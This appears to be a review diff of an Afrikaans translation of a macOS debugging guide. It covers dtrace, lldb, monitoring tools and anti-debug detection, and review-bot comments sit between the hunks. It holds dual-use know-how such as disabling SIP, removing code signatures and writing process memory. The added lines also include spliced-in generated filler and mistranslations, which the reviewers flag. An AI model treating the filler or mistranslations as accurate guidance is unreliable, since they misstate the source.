| **5de+ argument van die metode** | ### Swift -With Swift binaries, since there is Objective-C compatibility, sometimes you can extract declarations using [class-dump](https://github.com/nygard/class-dump/) but not always. - -With the **`jtool -l`** or **`otool -l`** command lines it's possible ti find several sections that start with **`__swift5`** prefix: +Met Swift-binêre lêers, aangesien daar Objective-C-verenigbaarheid is, kan jy soms verklarings onttrek deur [class-dump](https://github.com/nygard/class-dump/) te gebruik, maar nie altyd nie. +Met die **`jtool -l`** of **`otool -l`** opdraglyne is dit moontlik om verskeie afdelings te vind wat begin met die voorvoegsel **`__swift5`**: ```bash jtool2 -l /Applications/Stocks.app/Contents/MacOS/Stocks LC 00: LC_SEGMENT_64 Mem: 0x000000000-0x100000000 __PAGEZERO LC 01: LC_SEGMENT_64 Mem: 0x100000000-0x100028000 __TEXT - [...] - Mem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref - Mem: 0x100026d60-0x100027061 __TEXT.__swift5_reflstr - Mem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd - Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture - [...] +[...] +Mem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref +Mem: 0x100026d60-0x100027061 __TEXT.__swift5_reflstr +Mem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd +Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture +[...] ``` +Jy kan verdere inligting oor die **inligting wat in hierdie afdeling gestoor word in hierdie blogpos** vind (https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html). -You can find further information about the [**information stored in these section in this blog post**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html). - -Moreover, **Swift binaries might have symbols** (for example libraries need to store symbols so its functions can be called). 
The **symbols usually have the info about the function name** and attr in a ugly way, so they are very useful and there are "**demanglers"** that can get the original name: - +Verder, **Swift binaêre lêers kan simbole hê** (byvoorbeeld biblioteke moet simbole stoor sodat sy funksies geroep kan word). Die **simbole het gewoonlik die inligting oor die funksienaam** en attr op 'n lelike manier, so hulle is baie nuttig en daar is "**demanglers"** wat die oorspronklike naam kan kry: ```bash # Ghidra plugin https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py 
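Review bot: `### VerdagtePakket` and the link text `[**VerdagtePakket**](https://mothersruin.com/software/SuspiciousPackage/get.html)` translate the product name; SuspiciousPackage is a proper noun (the URL still says so) and should stay as-is. The Swift metadata reference is no longer a link: `+Jy kan verdere inligting oor die **inligting wat in hierdie afdeling gestoor word in hierdie blogpos** vind (https://knight.sc/...)` turns the markdown link into bold text followed by a bare URL in parentheses; restore the `[**...**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html)` form. In the `jtool2 -l` block the leading spaces on the `Mem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref` lines are stripped, a whitespace-only change inside tool output that should be left untouched. Minor: "Swift binaêre lêers" should be "binêre", and "Die klasinstansie-variables" is half-translated ("klasinstansieveranderlikes").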
@@ -176,94 +163,140 @@ https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py # Swift cli swift demangle ``` +### Gepakte binaire lêers -### Packed binaries +* Kontroleer vir hoë entropie +* Kontroleer die strings (as daar byna geen verstaanbare string is nie, is dit gepak) +* Die UPX-pakker vir MacOS genereer 'n afdeling genaamd "\_\_XHDR" -* Check for high entropy -* Check the strings (is there is almost no understandable string, packed) -* The UPX packer for MacOS generates a section called "\_\_XHDR" - -## Dynamic Analysis +## Dinamiese Analise {% hint style="warning" %} -Note that in order to debug binaries, **SIP needs to be disabled** (`csrutil disable` or `csrutil enable --without debug`) or to copy the binaries to a temporary folder and **remove the signature** with `codesign --remove-signature ` or allow the debugging of the binary (you can use [this script](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)) +Let daarop dat om binaire lêers te ontleed, **SIP gedeaktiveer moet word** (`csrutil disable` of `csrutil enable --without debug`) of om die binaire lêers na 'n tydelike vouer te kopieer en die handtekening met `codesign --remove-signature ` te verwyder of om die ontleed van die binaire lêer toe te laat (jy kan [hierdie skripsie](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b) gebruik) {% endhint %} {% hint style="warning" %} -Note that in order to **instrument system binaries**, (such as `cloudconfigurationd`) on macOS, **SIP must be disabled** (just removing the signature won't work). +Let daarop dat om **sisteem-binaire lêers** (soos `cloudconfigurationd`) op macOS te **instrumenteer**, moet SIP gedeaktiveer word (net die handtekening verwyder sal nie werk nie). {% endhint %} -### Unified Logs +### Vereenigde Logboeke -MacOS generates a lot of logs that can be very useful when running an application trying to understand **what is it doing**. 
+MacOS genereer baie logboeke wat baie nuttig kan wees wanneer 'n toepassing uitgevoer word om te probeer verstaan **wat dit doen**. -Moreover, the are some logs that will contain the tag `` to **hide** some **user** or **computer** **identifiable** information. However, it's possible to **install a certificate to disclose this information**. Follow the explanations from [**here**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log). +Daar is ook logboeke wat die etiket `` bevat om sekere **gebruikers-** of **rekenaaridentifiseerbare** inligting te **versteek**. Dit is egter moontlik om 'n sertifikaat te installeer om hierdie inligting bekend te maak. Volg die verduidelikings vanaf [**hierdie skakel**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log). ### Hopper -#### Left panel +#### Linker paneel -In the left panel of hopper it's possible to see the symbols (**Labels**) of the binary, the list of procedures and functions (**Proc**) and the strings (**Str**). Those aren't all the strings but the ones defined in several parts of the Mac-O file (like _cstring or_ `objc_methname`). +In die linker paneel van Hopper is dit moontlik om die simbole (**Etikette**) van die binaire lêer, die lys van prosedures en funksies (**Proc**) en die strings (**Str**) te sien. Dit is nie al die strings nie, maar diegene wat in verskeie dele van die Mac-O-lêer gedefinieer is (soos _cstring of_ `objc_methname`). -#### Middle panel +#### Middelste paneel -In the middle panel you can see the **dissasembled code**. And you can see it a **raw** disassemble, as **graph**, as **decompiled** and as **binary** by clicking on the respective icon: +In die middelste paneel kan jy die **ontleedde kode** sien. En jy kan dit sien as 'n **rof** ontleed, as 'n **grafiek**, as **ontsommel** en as **binêr** deur op die betrokke ikoon te klik:
-Right clicking in a code object you can see **references to/from that object** or even change its name (this doesn't work in decompiled pseudocode): +Deur met die rechtermuisknop op 'n kode-object te klik, kan jy **verwysings na/van daardie objek** sien of selfs sy naam verander (dit werk nie in ontsommelde pseudokode nie):
-Moreover, in the **middle down you can write python commands**. +Verder kan jy in die **middelste onderste deel Python-opdragte skryf**. -#### Right panel +#### Regter paneel -In the right panel you can see interesting information such as the **navigation history** (so you know how you arrived at the current situation), the **call grap**h where you can see all the **functions that call this function** and all the functions that **this function calls**, and **local variables** information. +In die regter paneel kan jy interessante inligting sien soos die **navigasiegeskiedenis** (sodat jy weet hoe jy by die huidige situasie uitgekom het), die **oproepgrafiek** waar jy al die **funksies kan sien wat hierdie funksie oproep** en al die funksies wat **hierdie funksie oproep**, en inligting oor **plaaslike veranderlikes**. ### dtrace -It allows users access to applications at an extremely **low level** and provides a way for users to **trace** **programs** and even change their execution flow. Dtrace uses **probes** which are **placed throughout the kernel** and are at locations such as the beginning and end of system calls. +Dit stel gebruikers in staat om toepassings op 'n uiters **lae vlak** te benader en bied 'n manier vir gebruikers om **programme te volg** en selfs hul uitvoeringsvloei te **verander**. Dtrace gebruik **sondes** wat **regdeur die kernel geplaas** word en op plekke soos die begin en einde van stelseloproepe is. -DTrace uses the **`dtrace_probe_create`** function to create a probe for each system call. These probes can be fired in the **entry and exit point of each system call**. The interaction with DTrace occur through /dev/dtrace which is only available for the root user. +DTrace gebruik die **`dtrace_probe_create`**-funksie om 'n sonde vir elke stelseloproep te skep. Hierdie sonde kan by die **intree- en uittreepunt van elke stelseloproep** geaktiveer word. 
Die interaksie met DTrace vind plaas deur middel van /dev/dtrace wat slegs beskikbaar is vir die root-gebruiker. {% hint style="success" %} -To enable Dtrace without fully disabling SIP protection you could execute on recovery mode: `csrutil enable --without dtrace` +Om Dtrace te aktiveer sonder om SIP-beskerming heeltemal te deaktiveer, kan jy in herstelmodus uitvoer: `csrutil enable --without dtrace` -You can also **`dtrace`** or **`dtruss`** binaries that **you have compiled**. +Jy kan ook **`dtrace`** of **`dtruss`** binaire lêers wat **jy self saamgestel het**, gebruik. {% endhint %} -The available probes of dtrace can be obtained with: - +Die beskikbare sonde van dtrace kan verkry word met: ```bash dtrace -l | head - ID PROVIDER MODULE FUNCTION NAME - 1 dtrace BEGIN - 2 dtrace END - 3 dtrace ERROR - 43 profile profile-97 - 44 profile profile-199 +ID PROVIDER MODULE FUNCTION NAME +1 dtrace BEGIN +2 dtrace END +3 dtrace ERROR +43 profile profile-97 +44 profile profile-199 ``` +Die ondersoeknaam bestaan uit vier dele: die verskaffer, module, funksie en naam (`fbt:mach_kernel:ptrace:entry`). As jy nie 'n deel van die naam spesifiseer nie, sal Dtrace daardie deel as 'n wildcard toepas. -The probe name consists of four parts: the provider, module, function, and name (`fbt:mach_kernel:ptrace:entry`). If you not specifies some part of the name, Dtrace will apply that part as a wildcard. +Om DTrace te konfigureer om ondersoeke te aktiveer en om te spesifiseer watter aksies uitgevoer moet word wanneer hulle aktiveer, sal ons die D-taal moet gebruik. -To configure DTrace to activate probes and to specify what actions to perform when they fire, we will need to use the D language. 
+'n Meer gedetailleerde verduideliking en meer voorbeelde kan gevind word in [https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html) -A more detailed explanation and more examples can be found in [https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html) +#### Voorbeelde -#### Examples - -Run `man -k dtrace` to list the **DTrace scripts available**. Example: `sudo dtruss -n binary` - -* In line +Voer `man -k dtrace` uit om die **DTrace-skrips beskikbaar** te lys. Voorbeeld: `sudo dtruss -n binary` +* Op lyn ```bash #Count the number of syscalls of each running process sudo dtrace -n 'syscall:::entry {@[execname] = count()}' ``` +# Skripsie -* script +Hierdie is 'n skripsie oor die inspekteer, foutopsporing en fuzzing van macOS-toepassings. Hierdie tegnieke kan gebruik word om die sekuriteit van macOS-toepassings te verbeter en voorregverhoging te bereik. +## Inspekteer + +By die inspekteer van 'n macOS-toepassing, kan jy die toepassing se bronkode, afhanklikhede en ander relevante inligting ontleed. Hier is 'n paar tegnieke wat jy kan gebruik: + +### 1. Disassembling + +Deur die toepassing te disassembleer, kan jy die masjienkode ontleed en die programlogika verstaan. Jy kan hulpmiddels soos `Hopper Disassembler` of `IDA Pro` gebruik om hierdie taak uit te voer. + +### 2. Dynamic Analysis + +Deur die toepassing dinamies te analiseer, kan jy sy gedrag tydens uitvoering bestudeer. Jy kan hulpmiddels soos `lldb` of `gdb` gebruik om die toepassing te ontleed en te monitor terwyl dit uitgevoer word. + +### 3. Reverse Engineering + +Deur die toepassing te herontwerp, kan jy die oorspronklike bronkode herstel. Jy kan hulpmiddels soos `class-dump` of `Hopper Disassembler` gebruik om die toepassing se klassedefinisies en metodes te ontleed. + +## Foutopsporing + +Foutopsporing is 'n belangrike tegniek om probleme in 'n toepassing te identifiseer en op te los. 
Hier is 'n paar tegnieke wat jy kan gebruik: + +### 1. Logging + +Deur logboeke in die toepassing in te skakel, kan jy nuttige inligting oor die toepassing se uitvoering versamel. Jy kan die `NSLog`-funksie gebruik om logboekinskrywings te skep en die `Console`-toepassing gebruik om die logboeke te monitor. + +### 2. Breakpoints + +Deur breekpunte in die toepassing te plaas, kan jy die uitvoering stop en die toestand van die toepassing ondersoek. Jy kan hulpmiddels soos `lldb` of `gdb` gebruik om breekpunte te plaas en die toepassing te ontleed terwyl dit uitgevoer word. + +### 3. Memory Analysis + +Deur die geheue van die toepassing te analiseer, kan jy probleme soos geheuelekke of ongeldige geheueverwysings identifiseer. Jy kan hulpmiddels soos `Instruments` of `Valgrind` gebruik om hierdie analise uit te voer. + +## Fuzzing + +Fuzzing is 'n tegniek wat gebruik word om die toepassing te toets deur ongeldige of lukrake insette te voorsien. Hier is 'n paar tegnieke wat jy kan gebruik: + +### 1. Input Mutation + +Deur die insette van die toepassing te muteer, kan jy verskillende scenario's simuleer en potensiële probleme identifiseer. Jy kan hulpmiddels soos `AFL` of `Radamsa` gebruik om die insette te muteer. + +### 2. Protocol Fuzzing + +Deur die kommunikasieprotokolle van die toepassing te fuzz, kan jy die toepassing se reaksie op ongeldige of onverwagte protokolopdragte toets. Jy kan hulpmiddels soos `Sulley` of `Peach` gebruik om hierdie tipe fuzzing uit te voer. + +### 3. File Fuzzing + +Deur lukrake of ongeldige lêers as insette te gebruik, kan jy die toepassing se hantering van lêers toets. Jy kan hulpmiddels soos `zzuf` of `Atheris` gebruik om hierdie tipe fuzzing uit te voer. + +Met hierdie inspekteer-, foutopsporing- en fuzzingtegnieke kan jy die sekuriteit van macOS-toepassings verbeter en voorregverhoging bereik. Dit is belangrik om hierdie tegnieke verantwoordelik en eties te gebruik. ```bash syscall:::entry /pid == $1/ 
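Review bot: the `+` side of this hunk replaces the `* script` bullet with a generated section (`# Skripsie`, `## Inspekteer`, `## Foutopsporing`, `## Fuzzing`, with subsections on Disassembling, Logging, Breakpoints, Input Mutation, Protocol Fuzzing and File Fuzzing) that has no counterpart in the removed `-` lines and is spliced between the one-liner `sudo dtrace -n 'syscall:::entry {@[execname] = count()}'` and the `syscall:::entry /pid == $1/` script, so the second example loses its label and the page gains unrelated filler. Drop the generated block and restore the bullet as `* skrip` (`skripsie` means a thesis, not a script). Two smaller points in the same hunk: probes are rendered as `sonde` in one line and `ondersoeke`/`ondersoeknaam` in the next, so pick one term; and stripping the leading spaces from the `dtrace -l | head` sample output (`ID PROVIDER MODULE FUNCTION NAME` / `1 dtrace BEGIN`) destroys the column alignment that makes the output readable, so leave sample output byte-identical.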
@@ -271,17 +304,17 @@ syscall:::entry } #Log every syscall of a PID -sudo dtrace -s script.d 1234 +sudo dtrace -s script.d 1234 ``` ```bash syscall::open:entry { - printf("%s(%s)", probefunc, copyinstr(arg0)); +printf("%s(%s)", probefunc, copyinstr(arg0)); } syscall::close:entry { - printf("%s(%d)\n", probefunc, arg0); +printf("%s(%d)\n", probefunc, arg0); } #Log files opened and closed by a process 
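Review bot: this hunk only removes the indentation inside the D script bodies (`printf("%s(%s)", probefunc, copyinstr(arg0));` and `printf("%s(%d)\n", probefunc, arg0);` now sit at column 0) and rewrites `sudo dtrace -s script.d 1234` with no visible change; a translation pass should leave code blocks byte-identical, so revert this whitespace-only churn.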
@@ -291,100 +324,105 @@ sudo dtrace -s b.d -c "cat /etc/hosts" ```bash syscall:::entry { - ; +; } syscall:::return { - printf("=%d\n", arg1); +printf("=%d\n", arg1); } #Log sys calls with values sudo dtrace -s syscalls_info.d -c "cat /etc/hosts" ``` - ### dtruss +`dtruss` is a command-line tool available on macOS that allows you to trace and inspect system calls made by an application. It can be used for debugging and analyzing the behavior of macOS applications. + +To use `dtruss`, you need to run it with the target application as an argument. It will then display a list of system calls made by the application, along with their arguments and return values. This can be useful for understanding how an application interacts with the operating system and identifying any potential security vulnerabilities or performance issues. + +Here is an example of how to use `dtruss`: + +```bash +$ sudo dtruss -f -p +``` + +In this command, `-f` specifies that `dtruss` should follow child processes, and `-p ` specifies the process ID of the target application. Running `dtruss` with these options will display a live stream of system calls made by the application. + +Keep in mind that `dtruss` requires root privileges to run, so you may need to use `sudo` to execute it. Additionally, it is important to only use `dtruss` on applications that you have permission to inspect, as it can potentially expose sensitive information. + +Overall, `dtruss` is a powerful tool for inspecting and debugging macOS applications. By tracing system calls, you can gain valuable insights into an application's behavior and identify potential security issues. 
```bash dtruss -c ls #Get syscalls of ls dtruss -c -p 1000 #get syscalls of PID 1000 ``` - ### ktrace -You can use this one even with **SIP activated** - +Jy kan dit selfs gebruik met **SIP geaktiveer** ```bash ktrace trace -s -S -t c -c ls | grep "ls(" ``` - ### ProcessMonitor -[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating). +[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is 'n baie nuttige instrument om die prosesverwante aksies wat 'n proses uitvoer te monitor (byvoorbeeld, om te monitor watter nuwe prosesse 'n proses skep). ### SpriteTree -[**SpriteTree**](https://themittenmac.com/tools/) is a tool to prints the relations between processes.\ -You need to monitor your mac with a command like **`sudo eslogger fork exec rename create > cap.json`** (the terminal launching this required FDA). And then you can load the json in this tool to viwe all the relations: +[**SpriteTree**](https://themittenmac.com/tools/) is 'n instrument wat die verhoudings tussen prosesse afdruk.\ +Jy moet jou Mac monitor met 'n bevel soos **`sudo eslogger fork exec rename create > cap.json`** (die terminal wat dit lanceer, vereis FDA). En dan kan jy die json in hierdie instrument laai om al die verhoudings te sien:
### FileMonitor -[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events. +[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) maak dit moontlik om lêer-gebeure (soos skepping, wysigings en verwyderings) te monitor en bied gedetailleerde inligting oor sulke gebeure. ### Crescendo -[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) is a GUI tool with the look and feel Windows users may know from Microsoft Sysinternal’s _Procmon_. This tool allows the recording of various event types to be started and stopped, allows for the filtering of these events by categories such as file, process, network, etc., and provides the functionality to save the events recorded in a json format. +[**Crescendo**](https://github.com/SuprHackerSteve/Crescendo) is 'n GUI-instrument met die voorkoms en gevoel wat Windows-gebruikers mag ken van Microsoft Sysinternal se _Procmon_. Hierdie instrument maak dit moontlik om die opname van verskillende tipes gebeure te begin en te stop, maak dit moontlik om hierdie gebeure te filter volgens kategorieë soos lêer, proses, netwerk, ens., en bied die funksionaliteit om die opgeneemde gebeure in 'n json-formaat te stoor. ### Apple Instruments -[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) are part of Xcode’s Developer tools – used for monitoring application performance, identifying memory leaks and tracking filesystem activity. +[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) is deel van Xcode se Ontwikkelaarshulpmiddels - dit word gebruik om programprestasie te monitor, geheuelekasies te identifiseer en lêersisteemaktiwiteit te volg. 
![](<../../../.gitbook/assets/image (15).png>) ### fs\_usage -Allows to follow actions performed by processes: - +Maak dit moontlik om aksies wat deur prosesse uitgevoer word, te volg: ```bash fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names containing ls fs_usage -w -f network curl #This tracks network actions ``` - ### TaskExplorer -[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\ -It also checks the binary processes against **virustotal** and show information about the binary. +[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is nuttig om die **biblioteke** wat deur 'n binêre lêer gebruik word, die **lêers** wat dit gebruik en die **netwerk**-verbindings te sien.\ +Dit kontroleer ook die binêre prosesse teen **virustotal** en wys inligting oor die binêre lêer. ## PT\_DENY\_ATTACH -In [**this blog post**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html) you can find an example about how to **debug a running daemon** that used **`PT_DENY_ATTACH`** to prevent debugging even if SIP was disabled. +In [**hierdie blogpos**](https://knight.sc/debugging/2019/06/03/debugging-apple-binaries-that-use-pt-deny-attach.html) kan jy 'n voorbeeld vind oor hoe om 'n lopende daemon te **debug** wat **`PT_DENY_ATTACH`** gebruik om te voorkom dat dit gedebug word, selfs as SIP gedeaktiveer is. ### lldb -**lldb** is the de **facto tool** for **macOS** binary **debugging**. - +**lldb** is die de **facto-hulpmiddel** vir **macOS** binêre **debugging**. 
```bash lldb ./malware.bin lldb -p 1122 lldb -n malware.bin lldb -n malware.bin --waitfor ``` - -You can set intel flavour when using lldb creating a file called **`.lldbinit`** in your home folder with the following line: - +Jy kan die intel-flavour instel wanneer jy lldb gebruik deur 'n lêer genaamd **`.lldbinit`** in jou tuisgids te skep met die volgende lyn: ```bash settings set target.x86-disassembly-flavor intel ``` - {% hint style="warning" %} -Inside lldb, dump a process with `process save-core` +Binne lldb, dump 'n proses met `process save-core` {% endhint %} -
(lldb) CommandDescription
run (r)Starting execution, which will continue unabated until a breakpoint is hit or the process terminates.
continue (c)Continue execution of the debugged process.
nexti (n / ni)Execute the next instruction. This command will skip over function calls.
stepi (s / si)Execute the next instruction. Unlike the nexti command, this command will step into function calls.
finish (f)Execute the rest of the instructions in the current function (“frame”) return and halt.
control + cPause execution. If the process has been run (r) or continued (c), this will cause the process to halt ...wherever it is currently executing.
breakpoint (b)

b main #Any func called main

b <binname>`main #Main func of the bin

b set -n main --shlib <lib_name> #Main func of the indicated bin

b -[NSDictionary objectForKey:]

b -a 0x0000000100004bd9

br l #Breakpoint list

br e/dis <num> #Enable/Disable breakpoint

breakpoint delete <num>

help

help breakpoint #Get help of breakpoint command

help memory write #Get help to write into the memory

reg

reg read

reg read $rax

reg read $rax --format <format>

reg write $rip 0x100035cc0

x/s <reg/memory address>Display the memory as a null-terminated string.
x/i <reg/memory address>Display the memory as assembly instruction.
x/b <reg/memory address>Display the memory as byte.
print object (po)

This will print the object referenced by the param

po $raw

{

dnsChanger = {

"affiliate" = "";

"blacklist_dns" = ();

Note that most of Apple’s Objective-C APIs or methods return objects, and thus should be displayed via the “print object” (po) command. If po doesn't produce a meaningful output use x/b

memorymemory read 0x000....
memory read $x0+0xf2a
memory write 0x100600000 -s 4 0x41414141 #Write AAAA in that address
memory write -f s $rip+0x11f+7 "AAAA" #Write AAAA in the addr
disassembly

dis #Disas current function

dis -n <funcname> #Disas func

dis -n <funcname> -b <basename> #Disas func
dis -c 6 #Disas 6 lines
dis -c 0x100003764 -e 0x100003768 # From one add until the other
dis -p -c 4 # Start in current address disassembling

parrayparray 3 (char **)$x1 # Check array of 3 components in x1 reg
+
(lldb) OpdragBeskrywing
run (r)Begin uitvoering, wat ononderbroke sal voortgaan totdat 'n breekpunt getref word of die proses beëindig word.
continue (c)Gaan voort met die uitvoering van die gedebugde proses.
nexti (n / ni)Voer die volgende instruksie uit. Hierdie opdrag sal oorslaan oor funksie-oproepe.
stepi (s / si)Voer die volgende instruksie uit. In teenstelling met die nexti-opdrag, sal hierdie opdrag in funksie-oproepe stap.
finish (f)Voer die res van die instruksies in die huidige funksie ("raam") uit en hou op.
control + cOnderbreek uitvoering. As die proses uitgevoer (r) of voortgesit (c) is, sal dit die proses laat staan ​​... waar dit tans uitgevoer word.
breakpoint (b)

b main #Enige funksie genaamd main

b <binname>`main #Hooffunksie van die bin

b set -n main --shlib <lib_name> #Hooffunksie van die aangeduide bin

b -[NSDictionary objectForKey:]

b -a 0x0000000100004bd9

br l #Breekpuntlys

br e/dis <num> #Aktiveer/Deaktiveer breekpunt

breakpoint delete <num>

help

help breakpoint #Kry hulp van breekpunt-opdrag

help memory write #Kry hulp om in die geheue te skryf

reg

reg read

reg read $rax

reg read $rax --format <formaat>

reg write $rip 0x100035cc0

x/s <reg/geheue-adres>Vertoon die geheue as 'n null-geëindigde string.
x/i <reg/geheue-adres>Vertoon die geheue as 'n samestellingsinstruksie.
x/b <reg/geheue-adres>Vertoon die geheue as 'n byte.
print object (po)

Dit sal die voorwerp wat deur die parameter verwys word, druk

po $raw

{

dnsChanger = {

"affiliate" = "";

"blacklist_dns" = ();

Merk op dat die meeste van Apple se Objective-C API's of metodes voorwerpe teruggee, en dus vertoon moet word deur middel van die "print object" (po) opdrag. As po nie 'n betekenisvolle uitset lewer nie, gebruik x/b

memorymemory read 0x000....
memory read $x0+0xf2a
memory write 0x100600000 -s 4 0x41414141 #Skryf AAAA in daardie adres
memory write -f s $rip+0x11f+7 "AAAA" #Skryf AAAA in die adres
disassembly

dis #Ontas huidige funksie

dis -n <funcname> #Ontas funksie

dis -n <funcname> -b <basename> #Ontas funksie
dis -c 6 #Ontas 6 lyne
dis -c 0x100003764 -e 0x100003768 # Van die een adres tot die ander
dis -p -c 4 # Begin by huidige adres ontleed

parrayparray 3 (char **)$x1 #Kontroleer reeks van 3 komponente in x1-reg
{% hint style="info" %} -When calling the **`objc_sendMsg`** function, the **rsi** register holds the **name of the method** as a null-terminated (“C”) string. To print the name via lldb do: +Wanneer die **`objc_sendMsg`**-funksie geroep word, hou die **rsi**-register die **naam van die metode** as 'n null-geëindigde ("C") string. Om die naam via lldb af te druk, doen die volgende: `(lldb) x/s $rsi: 0x1000f1576: "startMiningWithPort:password:coreCount:slowMemory:currency:"` 
@@ -394,30 +432,28 @@ When calling the **`objc_sendMsg`** function, the **rsi** register holds the **n `(lldb) reg read $rsi: rsi = 0x00000001000f1576 "startMiningWithPort:password:coreCount:slowMemory:currency:"` {% endhint %} -### Anti-Dynamic Analysis +### Anti-Dinamiese Analise -#### VM detection - -* The command **`sysctl hw.model`** returns "Mac" when the **host is a MacOS** but something different when it's a VM. -* Playing with the values of **`hw.logicalcpu`** and **`hw.physicalcpu`** some malwares try to detect if it's a VM. -* Some malwares can also **detect** if the machine is **VMware** based on the MAC address (00:50:56). -* It's also possible to find **if a process is being debugged** with a simple code such us: - * `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //process being debugged }` -* It can also invoke the **`ptrace`** system call with the **`PT_DENY_ATTACH`** flag. This **prevents** a deb**u**gger from attaching and tracing. - * You can check if the **`sysctl`** or **`ptrace`** function is being **imported** (but the malware could import it dynamically) - * As noted in this writeup, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\ - “_The message Process # exited with **status = 45 (0x0000002d)** is usually a tell-tale sign that the debug target is using **PT\_DENY\_ATTACH**_” +#### VM-opsporing +* Die opdrag **`sysctl hw.model`** gee "Mac" terug as die **gasheer 'n MacOS** is, maar iets anders as dit 'n VM is. +* Deur te speel met die waardes van **`hw.logicalcpu`** en **`hw.physicalcpu`** probeer sommige kwaadwillige programme om te bepaal of dit 'n VM is. +* Sommige kwaadwillige programme kan ook **vasstel of die masjien VMware-gebaseer** is op grond van die MAC-adres (00:50:56). 
+* Dit is ook moontlik om vas te stel of 'n proses gedebugeer word met 'n eenvoudige kode soos: +* `if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //proses word gedebugeer }` +* Dit kan ook die **`ptrace`**-sisteemaanroep met die **`PT_DENY_ATTACH`**-vlag aanroep. Dit **voorkom** dat 'n deb**u**gger kan koppel en naspeur. +* Jy kan nagaan of die **`sysctl`**- of **`ptrace`**-funksie **ingevoer** word (maar die kwaadwillige program kan dit dinamies invoer) +* Soos opgemerk in hierdie uiteensetting, “[Defeating Anti-Debug Techniques: macOS ptrace variants](https://alexomara.com/blog/defeating-anti-debug-techniques-macos-ptrace-variants/)” :\ +"_Die boodskap Process # exited with **status = 45 (0x0000002d)** is gewoonlik 'n duidelike teken dat die doelwit van die debuut **PT\_DENY\_ATTACH** gebruik_" ## Fuzzing ### [ReportCrash](https://ss64.com/osx/reportcrash.html) -ReportCrash **analyzes crashing processes and saves a crash report to disk**. A crash report contains information that can **help a developer diagnose** the cause of a crash.\ -For applications and other processes **running in the per-user launchd context**, ReportCrash runs as a LaunchAgent and saves crash reports in the user's `~/Library/Logs/DiagnosticReports/`\ -For daemons, other processes **running in the system launchd context** and other privileged processes, ReportCrash runs as a LaunchDaemon and saves crash reports in the system's `/Library/Logs/DiagnosticReports` - -If you are worried about crash reports **being sent to Apple** you can disable them. If not, crash reports can be useful to **figure out how a server crashed**. +ReportCrash **ontleed afbrekende prosesse en stoor 'n afbrekingsverslag op die skyf**. 
'n Afbrekingsverslag bevat inligting wat 'n ontwikkelaar kan help om die oorsaak van 'n afbreking te diagnoseer.\ +Vir toepassings en ander prosesse **wat in die per-gebruiker launchd konteks loop**, loop ReportCrash as 'n LaunchAgent en stoor afbrekingsverslae in die gebruiker se `~/Library/Logs/DiagnosticReports/`\ +Vir daemons, ander prosesse **wat in die stelsel launchd konteks loop** en ander bevoorregte prosesse, loop ReportCrash as 'n LaunchDaemon en stoor afbrekingsverslae in die stelsel se `/Library/Logs/DiagnosticReports` +As jy bekommerd is oor afbrekingsverslae **wat na Apple gestuur word**, kan jy dit deaktiveer. As nie, kan afbrekingsverslae nuttig wees om **uit te vind hoe 'n bediener afgebreek het**. ```bash #To disable crash reporting: launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist 
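Review bot: `die doelwit van die debuut` mistranslates "the debug target" (`debuut` means a debut); use `die debug-teiken` or `die gedebugde proses`. The hunk also flattens the nested anti-debug bullets: `* \`if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //proses word gedebugeer }\`` and `* Jy kan nagaan of die ...` were indented sub-items of the preceding bullets on the `-` side and now sit at column 0, so the list loses its structure; keep the two-space indentation from the removed lines.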
